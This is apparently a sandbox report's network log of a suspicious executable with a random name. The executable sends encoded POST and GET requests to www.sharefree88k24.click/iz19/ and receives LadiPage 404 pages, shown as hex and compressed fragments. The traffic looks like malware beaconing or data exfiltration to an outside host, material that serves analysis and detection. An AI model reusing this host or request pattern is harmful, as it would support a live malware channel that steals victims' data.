                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.65376813.228.81.39803880C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:40:15.077296972 CET764OUTPOST /iz19/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Host: www.sharefree88k24.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 236
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.sharefree88k24.click
                                                            Referer: http://www.sharefree88k24.click/iz19/
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Data Raw: 70 4c 4e 50 63 74 6e 3d 5a 75 45 6c 74 30 59 72 7a 43 43 69 6b 51 35 42 4c 55 4d 61 59 4a 77 6a 66 4a 36 39 6c 41 4e 65 4a 53 45 65 72 79 6a 6b 61 79 44 2b 4a 4a 38 49 6b 4a 59 44 71 72 30 41 4c 54 78 57 51 63 57 55 76 6a 2b 56 46 77 61 4c 69 6b 46 78 67 70 57 69 6e 70 6a 70 77 7a 63 70 46 72 6e 35 4b 4e 67 51 61 32 61 63 2f 78 45 30 38 79 4b 69 59 39 5a 4c 75 33 4e 50 54 33 65 2f 2f 32 53 68 57 70 53 57 31 53 42 52 51 70 35 44 63 50 4a 78 44 73 62 6a 46 68 2b 43 64 48 64 30 46 5a 64 6f 43 4a 52 33 42 32 44 61 57 30 61 4f 69 4d 63 55 74 67 44 4f 78 45 61 33 76 6b 72 45 34 4e 4e 38 30 7a 52 5a 39 66 48 6c 39 71 74 74 46 71 6e 71 36 48 4d 4d 46 44 4a 38 75 6d 4b 50 30 46 70 59 75 4c 44 4e 52 51 3d 3d
                                                            Data Ascii: pLNPctn=ZuElt0YrzCCikQ5BLUMaYJwjfJ69lANeJSEeryjkayD+JJ8IkJYDqr0ALTxWQcWUvj+VFwaLikFxgpWinpjpwzcpFrn5KNgQa2ac/xE08yKiY9ZLu3NPT3e//2ShWpSW1SBRQp5DcPJxDsbjFh+CdHd0FZdoCJR3B2DaW0aOiMcUtgDOxEa3vkrE4NN80zRZ9fHl9qttFqnq6HMMFDJ8umKP0FpYuLDNRQ==
                                                            Jan 11, 2025 05:40:16.043466091 CET1236INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sat, 11 Jan 2025 04:40:15 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p
                                                            Data Raw:
                                                            Data Ascii:
                                                            Jan 11, 2025 05:40:16.043493032 CET1236INData Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f
                                                            Data Ascii: pupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2025-01-11 04:40:15.881554735 +0000 UTC m=+1197
                                                            Jan 11, 2025 05:40:16.043504953 CET1236INData Raw: 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f
                                                            Data Ascii: t-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/iz19; Max-A
                                                            Jan 11, 2025 05:40:16.043515921 CET794INData Raw: 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f
                                                            Data Ascii: kie: LADI_CAMP_PAGE_VIEW=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cook
                                                            Jan 11, 2025 05:40:16.043523073 CET1236INData Raw: 36 33 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9c 57 51 6f db 36 10 fe 2b ac 86 2d 36 70 72 ec 34 f1 3a 29 ce 30 74 dd 6b 07 ac db b0 a7 80 12 29 89 35 45 2a 24 15 db 35 fc df 77 24 65 d7 76 92 22 68 12 5b e4 dd f1 78 c7 fb ee a3 72 fb e6 f7 8f ef
                                                            Data Ascii: 637WQo6+-6pr4:)0tk)5E*$5w$ev"h[xr?V;J"'2]\^<.lx^+gLHiU3k>;a=Ng{;E[H|`6eft=L(@zlq:mq/._F
                                                            Jan 11, 2025 05:40:16.043531895 CET224INData Raw: 8b 34 83 cf 6d a7 07 f3 4a ac 11 44 e1 9d 22 a2 75 5f 47 3f c6 77 15 84 b3 e4 95 c3 c7 97 34 bc d7 79 cd f0 93 17 b4 5c 7a 98 28 96 99 ba a0 a3 29 f8 df c9 db f1 d3 1d c9 13 89 07 f8 36 6e 7c 3d 9d e2 11 b7 74 9d c6 39 c2 b6 1c f9 08 48 4a 6e 50
                                                            Data Ascii: 4mJD"u_G?w4y\z()6n|=t9HJnP5>D5C5ZFN7?W[}na3jn|w;4z_%if'1p5kzz3Xev90)xGbRO8c]R\MO8
                                                            Jan 11, 2025 05:40:16.043544054 CET1236INData Raw: 5d f7 95 ca 82 a2 94 48 e3 d9 db 83 d0 b3 1f 5e f4 be 63 f7 04 99 9f 81 3e 0f bd 72 10 72 29 45 67 85 cd f7 7c 74 e4 ea d5 49 3d 95 96 52 5b 7e ca 71 5f 81 43 0b 84 1b be c2 0e f0 08 75 c1 7f 7e 9c 6e 63 ce fb db 81 04 bc 1c 6a 88 2a 72 b8 27 42
                                                            Data Ascii: ]H^c>rr)Eg|tI=R[~q_Cu~ncj*r'BGkBV}kJ$D|@zZdaa]oY$"a}L}YRkFcH[)Rjp&EP/5@EQAIgnwoxGrp"~3
                                                            Jan 11, 2025 05:40:16.043694973 CET224INData Raw: 7a 69 27 f7 9c d1 46 05 9e 78 17 c7 5f 3f 1f 5f 2d 1e 04 6f a5 cd 15 58 4e c7 0f 43 fd 1e d8 00 96 6b 98 01 a9 ad 37 1b aa ab 9e 02 fb 29 0c 37 90 72 b0 d8 82 6c 11 d5 27 14 1c bd c4 78 d3 f3 52 06 85 c8 1f ef e5 fc 9b 0d ad cd 5c da 53 52 fc 12
                                                            Data Ascii: zi'Fx_?_-oXNCk7)7rl'xR\SRh.}3<U0pjef(ds(;(e%rYu}L!BnmCJ#B?;]Y!='A>?>x#{m_eHSd&Te]:[$N
                                                            Jan 11, 2025 05:40:16.043708086 CET1236INData Raw: 91 e4 7e 7c f0 f3 58 94 52 bd e6 96 28 5f 01 a6 b2 0e fd f1 f1 51 fe 16 8e 37 53 64 73 a1 07 f1 31 89 07 8c ee f8 92 1a d4 0b f5 6f 9d d2 dd f1 39 d9 1a 9f 4b 5a d8 e4 ef f1 cd 67 3b 02 c4 f8 8e 2b 67 bf b6 1e f2 01 7e 5c b5 72 a5 f6 f3 5d 72 76
                                                            Data Ascii: ~|XR(_Q7Sds1o9KZg;+g~\r]rvQ,;zAr)K?=n+|ZCb)]Li9HvM|ONGtI[tQlHr0szCuD~~O[?y~TK\,%y
                                                            Jan 11, 2025 05:40:16.043720007 CET967INData Raw: bf c5 61 61 1a 2f c2 b8 c1 52 00 ee 91 4a 92 04 b0 52 27 13 f8 03 e0 a2 a0 67 a7 98 fb 04 e5 88 d6 ae ba ce 09 5f c9 84 22 26 6a 9b 52 c5 56 73 a7 b1 43 2b 8f 1e 3e 7f f8 db e7 0f 8f 3e 69 a5 14 6d d1 45 8f b1 88 3d d2 da 6e 36 76 f1 8b 2e 22 d2
                                                            Data Ascii: aa/RJR'g_"&jRVsC+>>imE=n6v."h&Vh&,RD:7*##Ry[VYf0N:uSm!gDY)UJP!B0uKLhL'akdw5Xd\`F:7T(,UU<


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.65376913.228.81.39803880C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:40:17.632543087 CET1777OUTPOST /iz19/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Host: www.sharefree88k24.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1248
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.sharefree88k24.click
                                                            Referer: http://www.sharefree88k24.click/iz19/
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Data Raw: 70 4c 4e 50 63 74 6e 3d 5a 75 45 6c 74 30 59 72 7a 43 43 69 6b 51 35 42 4c 55 4d 61 59 4a 77 6a 66 4a 36 39 6c 41 4e 65 4a 53 45 65 72 79 6a 6b 61 79 4c 2b 4a 2f 41 49 6c 71 77 44 72 72 30 41 56 44 78 54 51 63 58 47 76 6a 32 52 46 77 65 45 69 68 5a 78 68 4d 43 69 75 34 6a 70 35 7a 63 70 64 62 6e 34 45 74 67 4a 61 79 2b 59 2f 78 55 30 38 79 4b 69 59 38 70 4c 2b 56 31 50 52 33 65 34 34 32 53 54 53 70 54 7a 31 53 4a 72 51 70 74 35 63 2b 70 78 44 49 2f 6a 57 6e 69 43 43 58 64 32 47 5a 64 77 43 4a 55 70 42 32 65 6c 57 30 65 67 69 4c 63 55 70 30 2b 4d 69 6e 57 55 73 31 75 38 6d 4f 31 6d 73 6b 42 70 2f 35 2f 37 7a 4b 59 59 4e 61 72 69 78 77 73 6a 45 42 52 78 72 47 79 64 38 6a 59 71 72 66 57 70 48 6e 2f 47 69 4a 4f 71 55 62 67 38 45 76 4d 71 56 7a 2b 75 34 33 38 30 69 7a 49 67 75 42 50 38 2b 35 77 37 74 6e 30 4b 52 30 62 37 55 57 6d 54 68 4c 65 2f 6e 41 41 65 75 65 48 44 79 55 2f 6a 45 64 2f 63 34 75 2b 4a 39 61 32 4b 46 39 50 6c 78 6f 4a 76 47 55 34 61 77 37 71 6f 70 51 78 37 4a 4c 58 52 54 32 6d 79 7a 4b [TRUNCATED]
                                                            Data Ascii: pLNPctn=ZuElt0YrzCCikQ5BLUMaYJwjfJ69lANeJSEeryjkayL+J/AIlqwDrr0AVDxTQcXGvj2RFweEihZxhMCiu4jp5zcpdbn4EtgJay+Y/xU08yKiY8pL+V1PR3e442STSpTz1SJrQpt5c+pxDI/jWniCCXd2GZdwCJUpB2elW0egiLcUp0+MinWUs1u8mO1mskBp/5/7zKYYNarixwsjEBRxrGyd8jYqrfWpHn/GiJOqUbg8EvMqVz+u4380izIguBP8+5w7tn0KR0b7UWmThLe/nAAeueHDyU/jEd/c4u+J9a2KF9PlxoJvGU4aw7qopQx7JLXRT2myzKWo7w9k5cP19J2J/i7cuOi6vIYE5+0T9w0LYaJLtmc9qv2DzYFen2zUXvDhgRChpdJT8xuGkULUzDjcpqevxS5h/owgx7CM2OFitgo0F4gjCWqsZPIe4hyoxXlQj7SEUyuM2G/t/t0weBX28yWoZvB1N44920iKj66U1snn+PQl08aZ6d6o+IkdIr5GDhwnPeYkO3Bilj5NNP7ZtdOQNxjqqFYvJCRkTBn1iZelipcbUYYtEMaQYyuFwNzCv4qIee2bqhDTHGwwzimhvLkHQYln2sBeaXV5jqHalz9sS9VRVx1Xuu0DwtlIPEiAs3L2uFZE7u8NJdmwygQ7xHE+srp0YHKH/0Jl8A5yNpsh7JqKz/qLSSywbGgK9rT6rNLwn+PhH382V72YseVfo20r7xZEgZNMpYyvnsIdWi3dxg74Zeus+cFUp0s4+vHqglRppmYVg48AB1A8/k8ypCP1gKjujQNuathrGeHux9Z0lc8NyFqEwdVKGY7zcWhBpNvh78VLU/s4dqry0aJcBv288P1E/MVwhOfRJW+ye1jd6YrBtOOIGhOXS3U8I2fWrLJrXca7PMJww/rQGU5deyRDN1jiQWz1D9dLKaQ7BZS5OnCKE5dzKZqOpMHlsEU3l+3MIN1KQGnz/Eol8M4Nuq5oIVEE69gy4P4WFLn7 [TRUNCATED]
                                                            Jan 11, 2025 05:40:18.583956957 CET1236INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sat, 11 Jan 2025 04:40:18 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p
                                                            Data Raw:
                                                            Data Ascii:
                                                            Jan 11, 2025 05:40:18.584067106 CET1236INData Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f
                                                            Data Ascii: pupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2025-01-11 04:40:18.424160919 +0000 UTC m=+1197
                                                            Jan 11, 2025 05:40:18.584076881 CET1236INData Raw: 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f
                                                            Data Ascii: t-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/iz19; Max-A
                                                            Jan 11, 2025 05:40:18.584254026 CET1236INData Raw: 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 50 41 47 45 5f 56 49 45 57 5f
                                                            Data Ascii: kie: LADI_CAMP_PAGE_VIEW=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_FORM_SUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cook
                                                            Jan 11, 2025 05:40:18.584264040 CET1018INData Raw: 9b 71 be 1b 8f c6 f9 ed 65 84 c8 80 c2 ce e8 8e 1b b7 59 24 ba ce 42 17 9d a1 95 5c 3e 6b 89 a8 3b 32 5c f1 c2 0a c7 5f 30 7e b9 15 0e f6 b1 19 2a 6d 5a ea 52 c6 1d 2f cf ac 1d 97 bc 6b b4 0a 75 f2 cb a4 50 4b 62 b8 c4 4e 53 36 ed 0c af b8 2b 9b
                                                            Data Ascii: qeY$B\>k;2\_0~*mZR/kuPKbNS6+XB\WB4X$mvyY[;%Rj#j^'bd{:Z$]HMBnT/lVh$,vvX kW`7^<0_kp.rt~.)%qQrG
                                                            Jan 11, 2025 05:40:18.584350109 CET1236INData Raw: 5d f7 95 ca 82 a2 94 48 e3 d9 db 83 d0 b3 1f 5e f4 be 63 f7 04 99 9f 81 3e 0f bd 72 10 72 29 45 67 85 cd f7 7c 74 e4 ea d5 49 3d 95 96 52 5b 7e ca 71 5f 81 43 0b 84 1b be c2 0e f0 08 75 c1 7f 7e 9c 6e 63 ce fb db 81 04 bc 1c 6a 88 2a 72 b8 27 42
                                                            Data Ascii: ]H^c>rr)Eg|tI=R[~q_Cu~ncj*r'BGkBV}kJ$D|@zZdaa]oY$"a}L}YRkFcH[)Rjp&EP/5@EQAIgnwoxGrp"~3
                                                            Jan 11, 2025 05:40:18.584434986 CET1236INData Raw: 7a 69 27 f7 9c d1 46 05 9e 78 17 c7 5f 3f 1f 5f 2d 1e 04 6f a5 cd 15 58 4e c7 0f 43 fd 1e d8 00 96 6b 98 01 a9 ad 37 1b aa ab 9e 02 fb 29 0c 37 90 72 b0 d8 82 6c 11 d5 27 14 1c bd c4 78 d3 f3 52 06 85 c8 1f ef e5 fc 9b 0d ad cd 5c da 53 52 fc 12
                                                            Data Ascii: zi'Fx_?_-oXNCk7)7rl'xR\SRh.}3<U0pjef(ds(;(e%rYu}L!BnmCJ#B?;]Y!='A>?>x#{m_eHSd&Te]:[$N~|XR(_
                                                            Jan 11, 2025 05:40:18.584446907 CET1191INData Raw: 46 a7 49 d9 e4 f4 21 12 b8 26 de 33 d6 33 7d c8 a7 db db ae 9b ca 38 a6 a0 d8 7b 09 3b c9 57 0e a6 2f b4 a5 04 79 dd 07 41 a3 e1 45 54 4e d8 29 07 3b 21 ef 12 7e ad 05 f8 ad 15 1f 4c 3e 35 d7 67 5c 42 0e 44 d1 ec db df 1c 2b 4b 06 1e 9e 1a c7 bc
                                                            Data Ascii: FI!&33}8{;W/yAETN);!~L>5g\BD+K2t|.u$1T-d#ZXObs?b $z>d,M(Y40bHgsm8R\I*u:{^H6&|,>Iy&Fuaa/RJR'


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.65377013.228.81.39803880C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 11, 2025 05:40:20.186403036 CET471OUTGET /iz19/?pLNPctn=UssFuDgs3yWnyhEQP3EfYsAhRMCH7zgrCGcgkyD6ajj4AvMHk5wjtqALVi5dIoOJqD+HUHGBnnVErrmet4uT5RoiUvX8LNA/Wgeh3xkS0BPrPIhQ4lBFRDGS5W/EZ42X8WJqP+8=&yL=ohjXjzZp0vl4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.sharefree88k24.click
                                                            Connection: close
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Jan 11, 2025 05:40:21.142358065 CET1236INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sat, 11 Jan 2025 04:40:21 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p
                                                            Data Raw:
                                                            Data Ascii:
                                                            Jan 11, 2025 05:40:21.142373085 CET224INData Raw: 70 75 70 78 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 2a 2e 6c 61 64 69 2e 6d 65 20 68 74 74 70 73 3a 2f 2f 73 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 67 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 20 68 74 74 70 73 3a 2f
                                                            Data Ascii: pupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.comSet-Cookie: LADI_DNS_CHECK="2025-01-11 04:40:20.98148803
                                                            Jan 11, 2025 05:40:21.142400980 CET1236INData Raw: 35 20 2b 30 30 30 30 20 55 54 43 20 6d 3d 2b 31 31 39 37 32 35 36 2e 32 36 35 38 38 32 36 35 33 22 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 30 39 20 4a 61 6e 20 32 30 33 35 20 30 34 3a 34 30 3a 32 30 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b
                                                            Data Ascii: 5 +0000 UTC m=+1197256.265882653"; Expires=Tue, 09 Jan 2035 04:40:20 GMTSet-Cookie: LADI_CLIENT_ID=5ce92432-f836-4aa9-7718-30ca903578af; Expires=Tue, 09 Jan 2035 04:40:20 GMTSet-Cookie: LADI_PAGE_VIEW=0; Path=/iz19; Expires=Tue, 09 Jan 203
                                                            Jan 11, 2025 05:40:21.142509937 CET1236INData Raw: 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 5f 50 41 54 48 3d 3b 20 50 61 74 68 3d 2f 69 7a 31
                                                            Data Ascii: ; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT_PATH=; Path=/iz19; Max-Age=0Set-Cook
                                                            Jan 11, 2025 05:40:21.142522097 CET1236INData Raw: 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 4c 41 44 49 5f 43 41 4d 50 5f 42 45 48 41 56 49 4f 52 5f 50 41 47 45 5f 56 49 45 57 3d 3b 20 50 61 74 68 3d 2f 69 7a 31 39 3b 20 4d 61 78 2d 41 67 65 3d 30 0d 0a 53 65 74 2d 43
                                                            Data Ascii: Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_PAGE_VIEW_PATH=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVIOR_FORMSUBMIT=; Path=/iz19; Max-Age=0Set-Cookie: LADI_CAMP_BEHAVI
                                                            Jan 11, 2025 05:40:21.142597914 CET1236INData Raw: 28 22 6d 65 74 61 22 29 3b 64 6f 63 56 69 65 77 70 6f 72 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 20 22 76 69 65 77 70 6f 72 74 22 29 3b 64 6f 63 56 69 65 77 70 6f 72 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65
                                                            Data Ascii: ("meta");docViewport.setAttribute("id", "viewport");docViewport.setAttribute("name", "viewport");docViewport.setAttribute("content", content);document.head.appendChild(docViewport);})();</script><meta property="og:title" content="404" /><meta
                                                            Jan 11, 2025 05:40:21.142707109 CET896INData Raw: 61 6e 2c 73 74 72 69 6b 65 2c 73 74 72 6f 6e 67 2c 73 75 62 2c 73 75 6d 6d 61 72 79 2c 73 75 70 2c 74 61 62 6c 65 2c 74 62 6f 64 79 2c 74 64 2c 74 65 78 74 61 72 65 61 2c 74 66 6f 6f 74 2c 74 68 2c 74 68 65 61 64 2c 74 69 6d 65 2c 74 72 2c 74 74
                                                            Data Ascii: an,strike,strong,sub,summary,sup,table,tbody,td,textarea,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;outline:0;font-size:100%;font:inherit;vertical-align:baseline;box-sizing:border-box;-webkit-font-smoothing:antialiase
                                                            Jan 11, 2025 05:40:21.142770052 CET1236INData Raw: 28 30 2c 30 2c 30 2c 2e 33 29 7d 2e 6c 61 64 69 70 61 67 65 2d 6d 65 73 73 61 67 65 20 2e 6c 61 64 69 70 61 67 65 2d 6d 65 73 73 61 67 65 2d 62 6f 78 7b 77 69 64 74 68 3a 34 30 30 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25
                                                            Data Ascii: (0,0,0,.3)}.ladipage-message .ladipage-message-box{width:400px;max-width:calc(100% - 50px);height:160px;border:1px solid rgba(0,0,0,.3);background-color:#fff;position:fixed;top:calc(50% - 155px);left:0;right:0;margin:auto;border-radius:10px}.l
                                                            Jan 11, 2025 05:40:21.142781019 CET1236INData Raw: 64 6e 2e 63 6f 6d 2f 76 32 2f 73 6f 75 72 63 65 2f 6c 61 64 69 2d 69 63 6f 6e 73 2e 73 76 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 34 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b
                                                            Data Ascii: dn.com/v2/source/ladi-icons.svg) no-repeat;background-position:4px;cursor:pointer;z-index:90000050}.ladi-section.ladi-section-readmore{transition:height 350ms linear 0s}.ladi-section .ladi-section-background{position:absolute;content:'';displa
                                                            Jan 11, 2025 05:40:21.142791986 CET1236INData Raw: 61 64 69 2d 67 61 6c 6c 65 72 79 20 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 76 69 65 77 3e 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 76 69 65 77 2d 69 74 65 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 62 61 63 6b 67
